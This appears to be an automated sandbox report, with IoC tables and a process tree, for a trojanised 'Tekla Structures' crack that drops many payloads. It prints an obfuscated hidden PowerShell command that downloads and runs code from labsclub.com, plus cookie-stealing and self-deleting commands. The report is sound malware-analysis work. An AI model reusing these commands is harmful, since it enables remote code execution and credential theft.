description flow ioc HTTP User-Agent header 141 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 359 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 367 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 137 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1344 setups.tmp 1344 setups.tmp -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 2060 Setup.exe Token: SeCreateTokenPrivilege 1312 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 1312 askinstall20.exe Token: SeLockMemoryPrivilege 1312 askinstall20.exe Token: SeIncreaseQuotaPrivilege 1312 askinstall20.exe Token: SeMachineAccountPrivilege 1312 askinstall20.exe Token: SeTcbPrivilege 1312 askinstall20.exe Token: SeSecurityPrivilege 1312 askinstall20.exe Token: SeTakeOwnershipPrivilege 1312 askinstall20.exe Token: SeLoadDriverPrivilege 1312 askinstall20.exe Token: SeSystemProfilePrivilege 1312 askinstall20.exe Token: SeSystemtimePrivilege 1312 askinstall20.exe Token: SeProfSingleProcessPrivilege 1312 askinstall20.exe Token: SeIncBasePriorityPrivilege 1312 askinstall20.exe Token: SeCreatePagefilePrivilege 1312 askinstall20.exe Token: SeCreatePermanentPrivilege 1312 askinstall20.exe Token: SeBackupPrivilege 1312 askinstall20.exe Token: SeRestorePrivilege 1312 askinstall20.exe Token: SeShutdownPrivilege 1312 askinstall20.exe Token: SeDebugPrivilege 1312 askinstall20.exe Token: SeAuditPrivilege 1312 askinstall20.exe Token: SeSystemEnvironmentPrivilege 1312 askinstall20.exe Token: SeChangeNotifyPrivilege 1312 askinstall20.exe Token: SeRemoteShutdownPrivilege 1312 askinstall20.exe Token: SeUndockPrivilege 1312 askinstall20.exe Token: SeSyncAgentPrivilege 1312 askinstall20.exe Token: SeEnableDelegationPrivilege 1312 askinstall20.exe Token: SeManageVolumePrivilege 1312 askinstall20.exe Token: SeImpersonatePrivilege 1312 askinstall20.exe Token: SeCreateGlobalPrivilege 1312 askinstall20.exe Token: 31 1312 askinstall20.exe Token: 32 1312 askinstall20.exe Token: 33 1312 askinstall20.exe Token: 34 1312 askinstall20.exe Token: 35 1312 askinstall20.exe Token: SeDebugPrivilege 2300 multitimer.exe Token: SeDebugPrivilege 3900 taskkill.exe Token: SeDebugPrivilege 3848 MicrosoftEdge.exe Token: SeDebugPrivilege 3848 MicrosoftEdge.exe Token: SeDebugPrivilege 3848 MicrosoftEdge.exe Token: SeDebugPrivilege 3848 MicrosoftEdge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3680 setups.exe 1344 setups.tmp 3848 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 496 wrote to memory of 188 496 Tekla_Structures_Extension_crack.exe 78 PID 496 wrote to memory of 188 496 Tekla_Structures_Extension_crack.exe 78 PID 496 wrote to memory of 188 496 Tekla_Structures_Extension_crack.exe 78 PID 188 wrote to memory of 3912 188 cmd.exe 81 PID 188 wrote to memory of 3912 188 cmd.exe 81 PID 188 wrote to memory of 3912 188 cmd.exe 81 PID 188 wrote to memory of 1020 188 cmd.exe 82 PID 188 wrote to memory of 1020 188 cmd.exe 82 PID 188 wrote to memory of 1020 188 cmd.exe 82 PID 188 wrote to memory of 1568 188 cmd.exe 83 PID 188 wrote to memory of 1568 188 cmd.exe 83 PID 188 wrote to memory of 1568 188 cmd.exe 83 PID 188 wrote to memory of 3092 188 cmd.exe 84 PID 188 wrote to memory of 3092 188 cmd.exe 84 PID 188 wrote to memory of 3092 188 cmd.exe 84 PID 1568 wrote to memory of 2564 1568 keygen-step-3.exe 85 PID 1568 wrote to memory of 2564 1568 keygen-step-3.exe 85 PID 1568 wrote to memory of 2564 1568 keygen-step-3.exe 85 PID 3092 wrote to memory of 2060 3092 keygen-step-4.exe 87 PID 3092 wrote to memory of 2060 3092 keygen-step-4.exe 87 PID 3912 wrote to memory of 3824 3912 keygen-pr.exe 88 PID 3912 wrote to memory of 3824 3912 keygen-pr.exe 88 PID 3912 wrote to memory of 3824 3912 keygen-pr.exe 88 PID 2564 wrote to memory of 3168 2564 cmd.exe 89 PID 2564 wrote to memory of 3168 2564 cmd.exe 89 PID 2564 wrote to memory of 3168 2564 cmd.exe 89 PID 3824 wrote to memory of 2160 3824 key.exe 90 PID 3824 wrote to memory of 2160 3824 key.exe 90 PID 3824 wrote to memory of 2160 3824 key.exe 90 PID 2060 wrote to memory of 2300 2060 Setup.exe 91 PID 2060 wrote to memory of 2300 2060 Setup.exe 91 PID 2060 wrote to memory of 3680 2060 Setup.exe 92 PID 2060 wrote to memory of 3680 2060 Setup.exe 92 PID 2060 wrote to memory of 3680 2060 Setup.exe 92 PID 3092 wrote to memory of 1312 3092 keygen-step-4.exe 93 PID 3092 wrote to memory of 1312 3092 keygen-step-4.exe 93 PID 3092 wrote to memory of 1312 3092 keygen-step-4.exe 93 PID 3680 wrote to memory of 1344 3680 setups.exe 94 PID 3680 wrote to memory of 1344 3680 setups.exe 94 PID 3680 wrote to memory of 1344 3680 setups.exe 94 PID 1312 wrote to memory of 3632 1312 askinstall20.exe 96 PID 1312 wrote to memory of 3632 1312 askinstall20.exe 96 PID 1312 wrote to memory of 3632 1312 askinstall20.exe 96 PID 3632 wrote to memory of 3900 3632 cmd.exe 98 PID 3632 wrote to memory of 3900 3632 cmd.exe 98 PID 3632 wrote to memory of 3900 3632 cmd.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\Tekla_Structures_Extension_crack.exe"C:\Users\Admin\AppData\Local\Temp\Tekla_Structures_Extension_crack.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:496 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:188 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2160
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1020
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:3168
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Users\Admin\AppData\Local\Temp\RPJZWYTEA9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RPJZWYTEA9\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2300 -
C:\Users\Admin\AppData\Local\Temp\RPJZWYTEA9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RPJZWYTEA9\multitimer.exe" 1 3.1617436106.60681dcaa984e 1016⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\RPJZWYTEA9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RPJZWYTEA9\multitimer.exe" 2 3.1617436106.60681dcaa984e7⤵PID:4600
-
C:\Users\Admin\AppData\Local\Temp\3iqxfs0bguf\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\3iqxfs0bguf\cpyrix.exe" /VERYSILENT8⤵PID:2408
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:4700
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵PID:4920
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵PID:5140
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵PID:3416
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5392
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:5128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kjkmcr12kce\app.exe"C:\Users\Admin\AppData\Local\Temp\kjkmcr12kce\app.exe" /8-238⤵PID:3252
-
-
C:\Users\Admin\AppData\Local\Temp\clr0fwazyvn\3o341pxwfce.exe"C:\Users\Admin\AppData\Local\Temp\clr0fwazyvn\3o341pxwfce.exe" /VERYSILENT8⤵PID:5104
-
C:\Users\Admin\AppData\Local\Temp\is-00FP1.tmp\3o341pxwfce.tmp"C:\Users\Admin\AppData\Local\Temp\is-00FP1.tmp\3o341pxwfce.tmp" /SL5="$50030,2592217,780800,C:\Users\Admin\AppData\Local\Temp\clr0fwazyvn\3o341pxwfce.exe" /VERYSILENT9⤵PID:2480
-
C:\Users\Admin\AppData\Local\Temp\is-BG1V8.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-BG1V8.tmp\winlthsth.exe"10⤵PID:4956
-
C:\Users\Admin\AppData\Local\Temp\c0doImdyA.exe"C:\Users\Admin\AppData\Local\Temp\c0doImdyA.exe"11⤵PID:5488
-
C:\Users\Admin\AppData\Local\Temp\c0doImdyA.exe"C:\Users\Admin\AppData\Local\Temp\c0doImdyA.exe"12⤵PID:4864
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:7012
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:7832
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xhbf55lg2jr\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\xhbf55lg2jr\Setup3310.exe" /Verysilent /subid=5778⤵PID:3580
-
C:\Users\Admin\AppData\Local\Temp\is-KG9C2.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-KG9C2.tmp\Setup3310.tmp" /SL5="$20304,138429,56832,C:\Users\Admin\AppData\Local\Temp\xhbf55lg2jr\Setup3310.exe" /Verysilent /subid=5779⤵PID:5020
-
C:\Users\Admin\AppData\Local\Temp\is-99C1H.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-99C1H.tmp\Setup.exe" /Verysilent10⤵PID:4760
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:2592
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5856
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:2200
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 92812⤵
- Program crash
PID:9100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 100412⤵
- Program crash
PID:7940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 101212⤵
- Program crash
PID:6280
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:3388
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:1732
-
C:\Users\Admin\AppData\Local\Temp\is-27V6C.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-27V6C.tmp\LabPicV3.tmp" /SL5="$30416,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:5048
-
C:\Users\Admin\AppData\Local\Temp\is-AHSGS.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-AHSGS.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:4652
-
C:\Program Files\javcse\PNCLQDNZYH\prolab.exe"C:\Program Files\javcse\PNCLQDNZYH\prolab.exe" /VERYSILENT14⤵PID:4340
-
C:\Users\Admin\AppData\Local\Temp\is-7MTK1.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-7MTK1.tmp\prolab.tmp" /SL5="$702E8,575243,216576,C:\Program Files\javcse\PNCLQDNZYH\prolab.exe" /VERYSILENT15⤵PID:908
-
-
-
C:\Users\Admin\AppData\Local\Temp\c6-7cc36-486-08a96-2484d88bcf3fb\Lekukewiso.exe"C:\Users\Admin\AppData\Local\Temp\c6-7cc36-486-08a96-2484d88bcf3fb\Lekukewiso.exe"14⤵PID:4580
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ggkpaxg.yge\md6_6ydj.exe & exit15⤵PID:8688
-
C:\Users\Admin\AppData\Local\Temp\4ggkpaxg.yge\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\4ggkpaxg.yge\md6_6ydj.exe16⤵PID:8356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s0iozbvw.bi2\askinstall31.exe & exit15⤵PID:9020
-
C:\Users\Admin\AppData\Local\Temp\s0iozbvw.bi2\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\s0iozbvw.bi2\askinstall31.exe16⤵PID:9032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ret2vrb.xu4\toolspab1.exe & exit15⤵PID:8400
-
C:\Users\Admin\AppData\Local\Temp\1ret2vrb.xu4\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\1ret2vrb.xu4\toolspab1.exe16⤵PID:6540
-
C:\Users\Admin\AppData\Local\Temp\1ret2vrb.xu4\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\1ret2vrb.xu4\toolspab1.exe17⤵PID:6900
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3a-db3e5-aa2-ae1a4-8e48ea7fb7fdd\Cyhymaezhoqae.exe"C:\Users\Admin\AppData\Local\Temp\3a-db3e5-aa2-ae1a4-8e48ea7fb7fdd\Cyhymaezhoqae.exe"14⤵PID:936
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 194815⤵PID:9208
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:4856
-
C:\Users\Admin\AppData\Local\Temp\is-DBBP7.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-DBBP7.tmp\lylal220.tmp" /SL5="$303E8,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:3856
-
C:\Users\Admin\AppData\Local\Temp\is-RBKD2.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-RBKD2.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:5288
-
C:\Program Files\Windows Photo Viewer\QBLORUZYKE\irecord.exe"C:\Program Files\Windows Photo Viewer\QBLORUZYKE\irecord.exe" /VERYSILENT14⤵PID:5396
-
C:\Users\Admin\AppData\Local\Temp\is-UA4PC.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-UA4PC.tmp\irecord.tmp" /SL5="$302C0,6265333,408064,C:\Program Files\Windows Photo Viewer\QBLORUZYKE\irecord.exe" /VERYSILENT15⤵PID:5516
-
-
-
C:\Users\Admin\AppData\Local\Temp\d8-ba074-a6e-b38bc-15d93552faa6f\Banadisixae.exe"C:\Users\Admin\AppData\Local\Temp\d8-ba074-a6e-b38bc-15d93552faa6f\Banadisixae.exe"14⤵PID:4664
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bxg2d3bf.ozq\md6_6ydj.exe & exit15⤵PID:8556
-
C:\Users\Admin\AppData\Local\Temp\bxg2d3bf.ozq\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\bxg2d3bf.ozq\md6_6ydj.exe16⤵PID:9072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qmwy1en0.hkr\askinstall31.exe & exit15⤵PID:8900
-
C:\Users\Admin\AppData\Local\Temp\qmwy1en0.hkr\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\qmwy1en0.hkr\askinstall31.exe16⤵PID:8924
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:8072
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:1688
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qiisvnyx.z1h\toolspab1.exe & exit15⤵PID:9152
-
C:\Users\Admin\AppData\Local\Temp\qiisvnyx.z1h\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\qiisvnyx.z1h\toolspab1.exe16⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\qiisvnyx.z1h\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\qiisvnyx.z1h\toolspab1.exe17⤵PID:7936
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c0-8fb56-11b-6378f-ba6526c6639bb\ZHowamyvabo.exe"C:\Users\Admin\AppData\Local\Temp\c0-8fb56-11b-6378f-ba6526c6639bb\ZHowamyvabo.exe"14⤵PID:6116
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 96815⤵PID:6532
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:4268
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:5280
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:1480
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:4992
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:5296
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:5452
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:5432
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:3768
-
C:\Users\Admin\AppData\Local\Temp\2GJR7HJ7SL\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2GJR7HJ7SL\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:4264
-
C:\Users\Admin\AppData\Local\Temp\2GJR7HJ7SL\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2GJR7HJ7SL\multitimer.exe" 1 3.1617436250.60681e5ae6948 10313⤵PID:4940
-
C:\Users\Admin\AppData\Local\Temp\2GJR7HJ7SL\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2GJR7HJ7SL\multitimer.exe" 2 3.1617436250.60681e5ae694814⤵PID:7360
-
C:\Users\Admin\AppData\Local\Temp\zamhgido4kr\oyupdfk10hn.exe"C:\Users\Admin\AppData\Local\Temp\zamhgido4kr\oyupdfk10hn.exe" /ustwo INSTALL15⤵PID:8684
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "oyupdfk10hn.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\zamhgido4kr\oyupdfk10hn.exe" & exit16⤵PID:9140
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "oyupdfk10hn.exe" /f17⤵
- Kills process with taskkill
PID:6848
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\alijcwo4i1d\vict.exe"C:\Users\Admin\AppData\Local\Temp\alijcwo4i1d\vict.exe" /VERYSILENT /id=53515⤵PID:3064
-
C:\Users\Admin\AppData\Local\Temp\is-RUC0P.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-RUC0P.tmp\vict.tmp" /SL5="$C0054,870426,780800,C:\Users\Admin\AppData\Local\Temp\alijcwo4i1d\vict.exe" /VERYSILENT /id=53516⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\is-ROGL2.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-ROGL2.tmp\win1host.exe" 53517⤵PID:8580
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vs2in00lovw\app.exe"C:\Users\Admin\AppData\Local\Temp\vs2in00lovw\app.exe" /8-2315⤵PID:4632
-
-
C:\Users\Admin\AppData\Local\Temp\n3jiyolpoxz\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\n3jiyolpoxz\Setup3310.exe" /Verysilent /subid=57715⤵PID:5932
-
C:\Users\Admin\AppData\Local\Temp\is-B26OF.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-B26OF.tmp\Setup3310.tmp" /SL5="$4028E,138429,56832,C:\Users\Admin\AppData\Local\Temp\n3jiyolpoxz\Setup3310.exe" /Verysilent /subid=57716⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\is-KBRJ9.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-KBRJ9.tmp\Setup.exe" /Verysilent17⤵PID:8128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4wozkkct4ft\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\4wozkkct4ft\KiffApp1.exe"15⤵PID:5800
-
-
C:\Users\Admin\AppData\Local\Temp\obs1jaaoyqe\vpn.exe"C:\Users\Admin\AppData\Local\Temp\obs1jaaoyqe\vpn.exe" /silent /subid=48215⤵PID:6608
-
C:\Users\Admin\AppData\Local\Temp\is-JR34P.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-JR34P.tmp\vpn.tmp" /SL5="$402C6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\obs1jaaoyqe\vpn.exe" /silent /subid=48216⤵PID:6860
-
-
-
C:\Users\Admin\AppData\Local\Temp\w3djgd3qfrq\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\w3djgd3qfrq\cpyrix.exe" /VERYSILENT15⤵PID:6992
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:7532
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"17⤵PID:5016
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:7776
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9YTD6B9BRY\setups.exe"C:\Users\Admin\AppData\Local\Temp\9YTD6B9BRY\setups.exe" ll12⤵PID:4620
-
C:\Users\Admin\AppData\Local\Temp\is-LBGT6.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-LBGT6.tmp\setups.tmp" /SL5="$401D0,635399,250368,C:\Users\Admin\AppData\Local\Temp\9YTD6B9BRY\setups.exe" ll13⤵PID:5836
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"11⤵PID:5152
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:6132
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wt43veflb3u\vict.exe"C:\Users\Admin\AppData\Local\Temp\wt43veflb3u\vict.exe" /VERYSILENT /id=5358⤵PID:4556
-
C:\Users\Admin\AppData\Local\Temp\is-0BHE5.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-0BHE5.tmp\vict.tmp" /SL5="$1036C,870426,780800,C:\Users\Admin\AppData\Local\Temp\wt43veflb3u\vict.exe" /VERYSILENT /id=5359⤵PID:5156
-
C:\Users\Admin\AppData\Local\Temp\is-TKHQU.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-TKHQU.tmp\win1host.exe" 53510⤵PID:6100
-
C:\Users\Admin\AppData\Local\Temp\FnsViRVhj.exe"C:\Users\Admin\AppData\Local\Temp\FnsViRVhj.exe"11⤵PID:2072
-
C:\Users\Admin\AppData\Local\Temp\FnsViRVhj.exe"C:\Users\Admin\AppData\Local\Temp\FnsViRVhj.exe"12⤵PID:6136
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\z4mbojegrwb\kqb333mejw0.exe"C:\Users\Admin\AppData\Local\Temp\z4mbojegrwb\kqb333mejw0.exe" /ustwo INSTALL8⤵PID:5408
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "kqb333mejw0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\z4mbojegrwb\kqb333mejw0.exe" & exit9⤵PID:6068
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "kqb333mejw0.exe" /f10⤵
- Kills process with taskkill
PID:4304
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1rcj5g5zwzd\vpn.exe"C:\Users\Admin\AppData\Local\Temp\1rcj5g5zwzd\vpn.exe" /silent /subid=4828⤵PID:5424
-
C:\Users\Admin\AppData\Local\Temp\is-VG2UN.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-VG2UN.tmp\vpn.tmp" /SL5="$20312,15170975,270336,C:\Users\Admin\AppData\Local\Temp\1rcj5g5zwzd\vpn.exe" /silent /subid=4829⤵PID:5480
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:540
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:4988
-
-
-
